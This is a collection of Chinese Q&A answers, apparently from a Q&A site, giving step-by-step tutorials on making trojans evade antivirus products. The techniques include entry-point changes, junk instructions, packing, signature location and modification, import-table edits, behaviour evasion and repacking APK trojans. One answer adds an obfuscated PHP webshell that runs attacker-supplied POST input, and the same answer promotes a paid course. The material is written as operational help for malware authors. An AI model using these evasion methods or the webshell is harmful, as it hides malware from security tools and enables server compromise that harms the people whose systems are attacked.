免殺加密
『壹』 免殺的方法
一.入口點加1免殺法:
1.用到工具PEditor
2.特點:非常簡單實用,但有時還會被卡巴查殺]
3.操作要點:用PEditor打開無殼木馬程序,把原入口點加1即可
【二.變化入口地址免殺法:】
1.用到工具:OllyDbg,PEditor
2.特點:操作也比較容易,而且免殺效果比入口點加1點要佳.
3.操作要點:用OD載入無殼的木馬程序,把入口點的前二句移到零區域去執行,然後
又跳回到入口點的下面第三句繼續執行.最後用PEditor把入口點改成零區域的地址
【三.加花指令法免殺法:】
1.用到工具:OllyDbg,PEditor
2.特點:免殺通用性非常好,加了花指令後,就基本達到大量殺毒軟體的免殺.
3.操作要點:用OD打開無殼的木馬程序,找到零區域,把我們准備好的花指令填進去
填好後又跳回到入口點,保存好後,再用PEditor把入口點改成零區域處填入花指令的著地址.
【四.加殼或加偽裝殼免殺法:】
1.用到工具:一些冷門殼,或加偽裝殼的工具,比如木馬綵衣等.
2.特點:操作簡單化,但免殺的時間不長,可能很快被殺,也很難躲過卡巴的追殺
3.操作要點:為了達到更好的免殺效果可採用多重加殼,或加了殼後在加偽裝殼的免殺效果更佳
【五.打亂殼的頭文件或殼中加花免殺法:】
1.用到工具:秘密行動 ,UPX加殼工具.
2.特點:操作也是傻瓜化,免殺效果也正當不錯,特別對卡巴的免殺效果非常好
3.操作要點:首先一定要把沒加過殼的木馬程序用UPX加層殼,然後用秘密行動這款
工具中的SCramble功能進行把UPX殼的頭文件打亂,從而達到免殺效果.
【六.修改文件特徵碼免殺法:】
1.用到工具:特徵碼定位器,OllyDbg
2.特點:操作較復雜,要定位修改一系列過程,而且只針對每種殺毒軟體的免殺,要達
到多種殺毒軟體的免殺,必需修改各種殺毒軟體的特徵碼.但免殺效果好
[特徵碼修改方法]
特徵碼修改包括文件特徵碼修改和內存特徵碼修改,因為這二種特徵碼的修改方
法是通用的。所以就對目前流行的特徵碼修改方法作個總節。
[方法一:直接修改特徵碼的十六進製法]
1.修改方法:把特徵碼所對應的十六進制改成數字差1或差不多的十六進制.
2.適用范圍:一定要精確定位特徵碼所對應的十六進制,修改後一定要測試一下能否正常使用.
[方法二:修改字元串大小寫法]
1.修改方法:把特徵碼所對應的內容是字元串的,只要把大小字互換一下就可以了.
2.適用范圍:特徵碼所對應的內容必需是字元串,否則不能成功.
[方法三:等價替換法]
1.修改方法:把特徵碼所對應的匯編指令命令中替換成功能類擬的指令.
2.適用范圍:特徵碼中必需有可以替換的匯編指令.比如JN,JNE 換成JMP等.如果和我一樣對匯編不懂的可以去查查8080匯編手冊.
[方法四:指令順序調換法]
1.修改方法:把具有特徵碼的代碼順序互換一下.
2.適用范圍:具有一定的局限性,代碼互換後要不能影響程序的正常執行
[方法五:通用跳轉法]
1.修改方法:把特徵碼移到零區域(指代碼的空隙處),然後一個JMP又跳回來執行.
2.適用范圍:沒有什麼條件,是通用的改法,強烈建議大家要掌握這種改法.
木馬免殺的綜合修改方法
文件免殺方法:1.加冷門殼 2.加花指令 3.改程序入口點 4.改木馬文件特徵碼的5種常用方法
5.還有其它的幾種免殺修改技巧
【七.內存免殺方法:】
修改內存特徵碼:
方法1>直接修改特徵碼的十六進製法
方法2>修改字元串大小寫法
方法3>等價替換法
方法4>指令順序調換法
方法5>通用跳轉法
殼入口修改法
1.用到工具:壓縮殼 OD
2.特點:操作簡單 免殺效果好
3.操作步驟:首先給木馬加壓縮殼 然後用OD載入,在入口處的前15句中NOP掉某些代碼或者等價代換某些代碼
【八.輸入表免殺方法:】
[一,移位法]
1 首先用lordpe打開,目錄,導入表找到你要改的函數。比如說CommandLineA
2 記下未改前函數的thunkvalue 舉例:00062922
3 將要修改的文件用winhex等16進制形式打開,然後找到該函數的地址,比如說00062988
4 將該函數用00填充,移動到新地址如00070000
5 保存
6 將保存後的文件用lordpe打開,打開計算器,選擇16進制,00062988-00062922+00070000,計算結果修改為新的thunkvalue。保存
註:公式-> 內存地址=RAV+RAV基址 ,RAV基地址可以在LORDPE中看到.輸入表函數名前有兩個空格所以RAV的地址要減去2
[二,修改字元法]
今天定位Drat2.9卡巴特徵碼,是在輸入表上!(這時句廢話,現在卡巴基本都殺輸入表)
[特徵] 00025175_00000001 ZwUnmapViewOfSection 他的特徵碼位置是函數後面的那個00
(這個函數我在開始移動過位置,原始DAT文件的特徵碼是0002516A_00000001,同樣是函數後面的那個00)
我開始是選擇C32移動位置,LordPE修改輸入表,但是不行,後來試過OD指針移位,還是不行!CALL改JMP都不行
我發現LordPE可以修改函數名稱!便用C32將ZwUnmapViewOfSection函數後面加了個字元b(你可以隨意加字元)
由於LordPE讀取輸入表函數是從ThunkValue開始,一直到這個連續的字元串後的00處!
由於在ZwUnmapViewOfSection函數後加了個字元b,現在LordPE讀取的此處函數為ZwUnmapViewOfSectionb
此時將ZwUnmapViewOfSectionb函數後面的那個b刪除!保存下文件,這時就免殺了!
這樣一修改,在文件00025175處的16進制代碼不是00,而是62,所以卡巴就過了,而用lardPE修改後函數後,文件的輸入表的函數還是ZwUnmapViewOfSection,生成服務端可以運行!
【免殺經驗:】
1.加區,加花後,再加密,可以比較容易過卡巴----如加密工具vmprotect
脫殼過的木馬---加花指令,或加區加花---加密---加壓縮殼---再加區加花指令
2.單單加免殺花指令已經不能過卡巴,一定要配合加花後在加壓縮殼,才能起到免殺卡巴的效果.
vmprotect加密----再加花-----可過卡巴:
3.加雙層花指令免殺法----免卡巴
4.加密---007內存免----加壓 ---免卡巴或內存.
5.雙層加密(maskpE)---加壓 ----可過卡巴.
6.maskpe加密---asppack加殼 ---改入口點加1---可過卡巴
7.加密maskpe----加花或加區加花(用工具)-----加壓縮殼---免卡巴
8.北斗對黑防鴿子可加壓二次,再壓其它壓縮殼.以達免殺.
9.加過北斗殼,向上拉滾開滑鼠50多次,有一段空代碼,可以加花,轉移.
10.去頭轉移入口點---加花----加密(vmprotect) ----加壓縮==過所有殺毒
11.對付卡巴,加免殺花指令.花指令對瑞星表面查殺一般無效,一般加壓縮殼.
12.對付瑞星表面: 有些黑軟,加區,加花後被瑞星表面殺,可以這樣:先加壓過瑞星表面,然後加免殺花指令,過卡巴.
13.過瑞星表面的查殺方法: 1.加北斗內存免殺壓縮殼 2.加過瑞星表面的專用加密工具. 3.用maskPE加密工具加密 源碼免殺,要求樓主必須會編程語言,如C語言,E語言等。可以載入IDA中調試,通過修改源碼語句。
『貳』 輸入表能異或加密免殺么
不一定,異或只可以用作初級的免殺,不能躲過基於程序異常行為的殺軟的查殺
而且只加密輸入表通常效果都不會很明顯
『叄』 怎麼把文件做個免殺
以下是黑客動畫吧浩天的其中一課(復制) 1.加殼免殺 大家應該都會,建議你選擇一些生僻殼、強殼、新殼,或者加多重殼。 2.修改殼程序免殺 主要有兩種:一是通過加花指令的方法把殼偽裝成其它殼或者無殼程序。 二是通過reloc類軟體修改殼的區段入口點。 3.修改文件特徵代碼免殺 此方法的針對性是非常強的,就是說一般情況下你是修改的什麼殺毒軟體的特徵代碼,那麼就只可以在這種殺毒軟體下免殺。主要方法是:直接修改法 和 跳轉修改法。其中跳轉修改法可以用一些軟體來做到,比如:vmprotect ,我給用工具實現跳轉修改法,取了一個新名字叫:加密修改法。 4.加花指令免殺 此方法通用性強,而且效果好。主要有兩種:加區加花 和 去頭加花。 5.修改內存特徵代碼 目前內存殺毒的殺毒軟體強的並不多。比如:KV 雖然有內存殺毒但是它的內存病毒庫是非常弱的,基本沒有什麼東西。卡巴斯機 的內存殺毒其實不是真正意義上的內存殺毒,大家可以測試,木馬在卡巴斯機下一旦文件免殺,內存也就免殺了。 內存殺毒強的我個人認為還是我們國內的殺毒軟體瑞星。 修改內存特徵代碼對於初學免殺的朋友來說,難點應該是在內存特徵代碼定位上。 我們的 [中級階段:提高篇] 將有兩課重點講敘怎樣快速的做好內存定位。 至於內存特徵代碼的修改其實和文件特徵代碼的修改是一樣的為:跳轉修改法 和 直接修改法。但是為了避免出錯,建議大家盡量只使用 直接修改法。 6. 阻止殺毒軟體掃描內存,只是一個思路,可能要編程來實現。聽說有的殼程序可以做到,但是本人還沒有測試和驗證。
『肆』 免殺php一句話一般有哪些加密方式
?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]); $b({chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]); ?這個我是在後盾人學會的隱藏性很高,現在去有活動送價值兩千元後盾人會員卡
『伍』 DLL360免殺怎麼弄
需要用易語言編寫dll結合bat運行繞過360免殺。
1、源碼定位,首先刪減源碼,然後編譯,如果報毒,繼續刪減,直到不報毒為止,定位出報毒的子程序。
2、在敏感代碼前後,子程序前後,添加大量無意義的不報毒命令。
3、編譯後替換資源,建議替換360相關產品(非殺毒衛士)下帶證書的資源,最好是dll文件,越大越好。
4、壓縮殼或者加密殼,建議upx壓縮殼最高壓縮。
垃圾代碼最好寫成那種運算速度快的,否則會對你軟體的運行速度造成影響。
『陸』 誰有網馬免殺專用的加密工具啊
我使用的是文件夾加密超級大師。
這是一款專業的文件和文件夾加密軟體,使用本軟體可以很輕松地對文件、文件夾進行加密、解密操作,你只需要點擊文件夾加密超級大師軟體主窗口上的
文件夾加密按鈕,然後在彈出的窗口中選擇需要加密的文件夾,在彈出的文件夾加密窗口中輸入加密密碼就可以了。
此外,本軟體還支持右鍵菜單,右鍵選中要加密的文件夾後,在彈出的菜單中選擇「加密」,輸入密碼即可。
這兩種操作方法都非常的簡便,建議您不妨可以下載試試。
『柒』 加密就是免殺嗎
你好,很高興為你解答這個問題
加密可以達到免殺的效果,加密要說是免殺,那一是免殺的一種。做免殺可以選擇加密,加密也會用到保護程序不被破解等等。
回答完畢,謝謝!聯系我看我網路用戶名
『捌』 黑客們常說的加殼和免殺是一回事嗎
免殺,顧名思義就是說避免被殺毒軟體查殺! 免殺的方法也有很多種,針對不同的情況我們運用不同的免殺方法。 ⒈文件免殺:加花/修改文件特徵碼/加殼/修改加殼後的文件。 ⒉內存免殺:修改特徵碼。 ⒊行為免殺。 現在我來揭開免殺神秘的面紗。(這里不對免殺做深入討論,只對原理進行分析,畢竟這不是黑客教程) 加花 加花是病毒免殺的常用手段,加花原理就是通過添加加花指令(一些垃圾指令,類似加1減1之類的無用語句)讓殺毒軟體檢測不到特徵碼。加花可以分為加區加花和去頭加花。(只做了解,不做解釋) 特徵碼修改 加花以後一些殺毒軟體就認不出來了,但有些比較強的殺毒軟體,像卡巴斯基這類,可能還是會被殺,這時就要定位特徵碼修改了,要修改特徵碼,就要先定位殺毒軟體的病毒庫所定位的特徵碼,這個有一定難度,特別是復合特徵碼的定位,但復合特徵碼雖然增加了定位特徵碼的難度,但復合特徵碼也有它的弱點,因為定義復合特徵碼需要單個特徵碼幾倍的病毒庫,不方便用戶的病毒庫升級,所以除了特別流行的病毒,殺毒軟體廠商並沒有做太多的復合特徵碼。 定位了特徵碼之後就應該修改特徵碼了,主要方法有兩種:直接修改法,跳轉修改法。 直接修改法利用的是等效指令替換,或者指令順序的改變不影響執行的效果。還有一種是如果特徵碼是ASCll碼,可以直接修改大小寫,大寫替換小寫,小寫替換大寫。 跳轉修改發比較簡單,主要原理是把有特徵碼的那段NOP掉,然後把NOP掉的那段語句寫入空白的0000區,在通過JMP跳轉連接起來,讓殺毒軟體找不到特徵碼,從而達到免殺的目的。 加殼 加殼的原理是給原程序加上一段保護程序,有保護和加密功能,運行加殼後的文件先運行殼再運行真實文件,從而起到保護作用。 脫殼當然就是去掉保護程序 想要加殼後能達到免殺的效果 那就要加最新的免殺殼!!!!
『玖』 (滿意追加)免殺方法或者免殺教程,學慣用,非常感謝
首先來簡單了解一下殺毒軟體查殺病毒的原理,當前殺毒軟體對病毒的查殺主要有特徵代碼法和行為監測法。其中前一個比較方法古老,又分為文件查殺和內存查殺,殺毒軟體公司拿到病毒的樣本以後,定義一段病毒特徵碼到病毒庫中,然後與掃描的文件比對,如果一致則認為是病毒,內存查殺則是載入內存後再比對,第二個比較新,它利用的原理是某些特定的病毒會有某些特定的行為,來監測病毒。
免殺常用的工具:
Ollydbg 調試器簡稱OD,動態追蹤工具 peid 查殼工具 PEditor PE文件頭編輯工具
CCL,伯樂,MYCCL 特徵碼定位器 oc 地址轉換器 reloc 修改EP段地址工具 zeroadd 加區工具 Uedit32 十六進制編輯器
免殺方法
一.文件免殺
1.加花
2.修改文件特徵碼
3.加殼
4.修改加殼後的文件
二.內存免殺
修改特徵碼
三.行為免殺
加花
加花是文件免 殺的常用手段,加花原理就是通過添加花指令(一些垃圾指令,類似加1減1之類廢話)讓殺毒軟體檢測不到特徵碼。加花可以分為加區加花和去頭加花。一般加花 工具使用加區加花,當然也是可以手工加的,就是先用zeroadd添加一個區段,然後在新加區段里寫入花指令,然後跳轉到原入口;去頭加花,是先NOP (匯編里的空操作)掉程序的入口幾行,然後找到下方0000區,寫入NOP掉的代碼和一些花指令,再通過JMP(匯編里的無條件跳轉)跳到原入口。
加花以後一些殺毒軟體就認不出了,但有些比較強悍的殺毒,比如司機大叔(卡巴斯基)可能還是能查出來,這時就要定位特徵碼然後修改了,要修改首先必須知道特徵碼在哪裡,所以需要先定位特徵碼,這是個難點,特別是復合特徵碼的定位。
特徵碼定位
特徵碼定位主要有兩種方法:第一 直接替換法;第二 二叉數法;
直接替換法是最早開始出現的一種特徵碼定位方法,按一定的位元組數逐個替換原代碼並保存,比如木馬總共100位元組,可以先把0-10個位元組用0替換,保存, 然後用殺毒軟體掃描,不被查殺說明特徵碼已經被覆蓋掉了,如果還被查殺則替換10-20位元組,再保存,掃描……直到找出特徵碼。替換法的優點是容易理解, 速度快(對文件特徵碼而言),特徵碼定位工具伯樂以及CCL的手動方式就是利用的替換法原理,文件特徵碼定位經常使用的就是這種方法。但是對於內存特徵碼的定位這種方法就不太實用了,每次替換以後都要載入內存再掃描,如果木馬較大,替換生成的文件會 非常多,每個都要載入內存花費太多時間,除此之外它還有一個非常大的局限性,就是只能確定只有一處特徵碼的情況(某種特定情況下的多特徵碼也是適用的,下 面的第3種情況將有講述),殺毒軟體還有別的定位特徵碼的機制,比如有的殺毒的定義了a,b兩處特徵碼(三處或者更多原理是一樣的,為了講解方便,以下均 以兩處為例),只要a,b有一個存在便報毒,只有加大替換范圍直到兩處同時被替換才不報毒,如果兩處距離比較遠,定義出的范圍將非常粗糙,很明顯直接替換 法將不再合適,這時第二種方法就有用武之地了。
二叉數法使用的原理是一半一半定位,CCL的自動方式就是運用的這個原理。將待檢測段一分為二,分別替換並生成兩個文件A和B,其中A是原文件後半部分被0替換後生成的,B是前半部分被0替換的,殺毒開始查殺生成文件(如果是內存特徵碼定位則先載入內存再掃描內存),有4種情況
(1)A存在,B被刪:這種情況說明A文件中特徵碼已經被替換掉,因此將A的被替換部分一分為二,起始偏移為A的偏移,再進行檢測;
(2)A被刪,B存在:這種情況說明B文件中特徵碼已經被替換掉,因此將B的被替換部分一分為二,起始偏移為B的偏移,再進行檢測;
(3)A存在,B存在:這種情況說明沒法定位A和B中有沒有特徵碼,因此分別對A和B再一分為二進行檢測;
(4)A被刪,B被刪:這種情況說明兩個區段都存在特徵碼,因此分別對A和B再一分為二進行檢測。
對A再分時會將原來的B區段填充為0,相當於去除B區段的影響,只考慮A;同理對B再分時會將原來的A區段內容填0,相當於去除A區段的影響,只考慮B。
第(1)(2)對應的是只有一處特徵碼的情況,比較容易理解;
第(3)對應的是定義了a,b兩處特徵碼的情況,但是和前面提到的那種不同,殺毒軟體為避免誤判,定義了a,b兩處特徵碼,要ab同時存在時才報毒,假設a,b分別存在於A,B中,a,b不同時存在,殺毒對A,B均不報警,接下來該如何判斷呢?舉個例子說明一下
木 馬原來是…a……b…,第一次替換以後A:…a…000000,B:000000…b…,現在ab不同時存在,A,B都不被殺,則分別對A,B再次一分為 二,…a……b000,…a…000…,000……b…,…a000…b…,再次掃描就可以找到兩處特徵碼的位置,如果還是不行,再繼續分……直到全部找 到;其實這種類型的多特徵碼直接替換也是可以定位的,甚至效果更好,按一定位數替換,然後掃描,只要替換了一個特徵碼就不再報毒,所以不報毒的便是特徵碼 被覆蓋的,不管有幾處都可以定位出,而且修改時也只要修改任意一處就可以了。
第(4)種對應的情況也是殺毒定義了多處特徵碼,就是上面提到的那種情況,只要有一處符合就認定是病毒。還是以a,b兩處特徵碼為例,第一次替換後的結果同(3),兩部分分開考慮,互不影響, 相當於分解成兩個單個特徵碼的情況,第二次替換後變成000000…b000,000000…000…,000…000000,…a000000000, 依此類推,直到精確定位出所有特徵碼,如果有N處特徵碼就相當於分解成N個單特徵碼來定位,現在N一般小於等於3,這種情況定位出的所有特徵碼必須全部修 改了才能免殺。
二叉數法是個很不錯的思路,可以解決大部分的問題,但是不是無懈可擊呢?回答是否定的!可惡的殺毒軟體還有一個殺手鐧,就是復合特徵碼,給我們定位特徵碼 帶來了很大的麻煩。復合特徵碼的定位機制是,先定義出N個特徵碼,只要裡面某些同時出現便認為是病毒。舉個簡單例子說明一下:木馬原來是…a1…b1… c1…a2…b2…c2…(a1,a2一樣,加標號只是為了後面描述方便),只要abc同時出現就認為是病毒,這該如何定位呢?原理不是很難,也是利用替 換再查殺的方法,先從後往前用0替換,替換精度假設為每次替換量增加1000位元組,開始一直顯示是病毒,直到替換到地址13140040(為敘述方便隨便 說的一個地址)時替換的位元組達到15000個,即…a1…b1…00000000,兩個c都被替換掉了,此時顯示不是病毒,由此可知,特徵碼c1就在 13140040後面1000位元組內,減小替換位元組數比如改為替換14900位元組,即精度改為每次替換減小100位元組,還是無毒則減為替換14800字 節,不斷重復……直到精確定位出c1的位置;如果改為從前往後替換,則可以定位出a2的位置;其他特徵碼的定位可以利用已經定位到的c1,a2,把其中一 個用0替換了比如c1,從後往前就可以定位出c2,直到定位出所有特徵碼,其實原理並不復雜,但是要真正手動操作起來卻是非常麻煩的,我們可以利用 MYCCL,它用的原理與之類似,具體操作可以看MYCCL的操作幫助。還有一種方法更科學,原理是一樣,但是替換的位元組數不是等量增加的,而是以2的n -1次方增加的,第一次替換1位元組,第二次2位元組,第三次4位元組……減小時也按照這種規律,這種替換方法有點類似於二叉數法,可以更快定位出特徵碼的位 置,我想這也是MYCCL在復合特徵碼定位方面應該改進的地方吧。
復合特徵碼雖好,大家也不用害怕,認為所有殺毒都來個復合特徵碼我們就要累死了,定義復合特徵碼需要單個特徵碼幾倍的病毒庫,不方便用戶的升級,所以除了特別流行的病毒,定義復合特徵碼的也不是很多。
定位特徵碼有些經驗可以告訴大家,文件特徵碼的定位一般用直接替換法,可以借用CCL的手動定位;內存特徵碼定位,一般用二叉數法,可以用CCL自動定位。對於EXE文件如果文件較小,可以兩種方法結合,先用直接替換法生成,可以用伯樂這個工具(為什麼不用CCL呢,因為伯樂生成的是EXE文件可以看出圖標的模樣),找到還能正常運行的,那些圖標都變了的說明PE頭已經損壞了,就不要試了,然後載入內存,再掃描內存,如果既能正常運行又不被殺,恭喜你!成功了!定位出了大體范圍,再用CCL自動定位,很快就可以完成。如果文件較大,用伯樂生成的文件太多,也不方便,還是用CCL定位,對於DLL文件也只能老老實實用CCL定位了。
特徵碼修改
特徵碼修改可能需要一點匯編的知識,光碟里有常用的匯編語法介紹,修改主要有直接修改法和跳轉修改法。
直接修改法利用的是等效指令替換,比如
add eax,0c等效於sub eax,-0c
或者指令順序的改變不影響執行的效果,比如
add eax,0c;eax寄存器加上0c再賦給eax
add ebx,05;ebx寄存器加上05再賦給ebx
等效於
add ebx,05;ebx寄存器加上05再賦給ebx
add eax,0c;eax寄存器加上0c再賦給eax
還有一種是如果特徵碼是ASCII碼,可以直接修改大小寫,小寫字母換成大寫,大寫的換成小寫。
加殼
不用說了,用工具大家都會,加殼的原理是給原程序加上一段保護程序,有保護和加密功能,運行加殼後的文件是先運行殼再運行真實文件從而起到保護作用。我想提醒大家的是,再好的殼用的人多了,還是會被殺的,所以可以努力學好E文,自己到國外的網站找加殼工具,比較好。
修改加殼後的文件
加殼以後程序入口處會有一段特殊代碼,可以自己用OD打開不同加殼工具加過殼的文件, 可以發現不同的殼開頭那段代碼是不同的,也可以說成是殼的特徵代碼吧,對於常用的殼殺毒軟體可以脫掉殼再查殺,也就是所謂的穿殼技術,為了避免殺毒軟體認 出是加的哪種殼我們可以加雙殼,或者自己修改開頭那段代碼,從而讓殺毒看不出是什麼工具加的殼,這里我只講一種修改方法,可以參照去頭添加花指令,在空白 區域加入一段別的殼的特徵頭,然後JMP跳到原入口,這樣殺毒就會誤判加殼工具,從而達到免殺的效果,其實方法是多樣只要願意思考總能想出應對的方法。
還有一種修改殼的方法就是修改EP段的入口,用Peid查一下加過殼的木馬,可以發現EP段的地址,也就是區段入口,通過修改EP入口地址可以達到免殺的效果,利用的工具是reloc,具體使用方法自己去問google。
行為免殺
這種殺毒的代表是綠鷹PC萬能精靈。一般說來木馬在運行以後會復制到系統目錄下然後運行,原文件可能會自動刪除,現在的木馬一般是插入進程來訪問網路的,在進程里可以看到被插入的進程,設置開機啟動也是木馬必須做的可以寫入注冊表,加入服務,寫入驅動等等,這些便是木馬特有的行為。我們可以用注冊表監控,文件修改監控的工具比如木馬輔助查找器記錄修改的文件、注冊表,推測殺毒可能監控的是哪個行為從而對應修改行為來達到行為免殺。還有一個一般的方法,行為殺毒是不會查殺系統的啟動項的,我們可以把木馬的啟動項替換成非系統必須的開機自啟動項就可以成功免殺了。至於其他的方法,大家可以自己再研究。
至於網上流傳的入口加1,就是用PEditor將木馬入口地址+1,有時也是可以達到免殺的效果,好象是瑞星比較吃這個,還有個小竅門可以告訴大家,要讓 自己的免殺木馬盡量久的不被查到,最好選擇比較老的木馬來做,對新木馬,殺毒盯的緊會經常更新病毒庫,而老的呢……不用說了吧。
總結:
一般免殺步驟是先定義內存特徵碼,修改內存特徵碼,加花指令做文件免殺,如果還被某些殺毒查殺則定義文件特徵碼,修改特徵碼,接下來是行為免殺,然後加殼,再修改殼。內存免殺一般只要做瑞星的就可以了,其他的殺毒軟體沒有真正意義上的內存殺毒,比如卡巴斯基的內存掃描就是文件快速掃描,一般加入花指令(稍微學點匯編,折騰些垃圾代碼是很簡單的)以後就可以躲過金山,瑞星,江民的文件查殺,萬一有不過的就要定位特徵碼再修改,卡巴的文件查 殺是很牛的,加了殼也幾乎都能可以查出來,一般都要定位特徵碼再修改,對於諾頓這種喜歡把特徵碼定位在PE頭的只要用北斗之類工具加個殼,把PE頭改得一 塌糊塗,它就不認識了,如果還想把免殺做好點,可以把自己的服務和注冊表鍵值改成非系統必須的,要是你是不折不扣完美主義者,可以再修改一下加殼後的文件,把免殺進行到底!
『拾』 apk加密了html文件怎麼做免殺
1、先打開一下主控端,配置一下程序。2、打開ApkIDE.exe反編譯程序。3、載入apk服務端,直接拉進去即可。4、拉進入後,會自動反匯編編譯,編譯成功後,就可以修改裡面的代碼進行免殺了。5、修改完成後,點擊編譯生成apk。
免殺技術全稱為反殺毒技術AntiAnti-Virus簡稱「免殺」,它指的是一種能使病毒木馬免於被殺毒軟體查殺的技術。由於免殺技術的涉獵面非常廣,其中包含反匯編、逆向工程、系統漏洞等黑客技術,所以難度很高,一般人不會或沒能力接觸這技術的深層內容。其內容基本上都是修改病毒、木馬的內容改變特徵碼,從而躲避了殺毒軟體的查殺。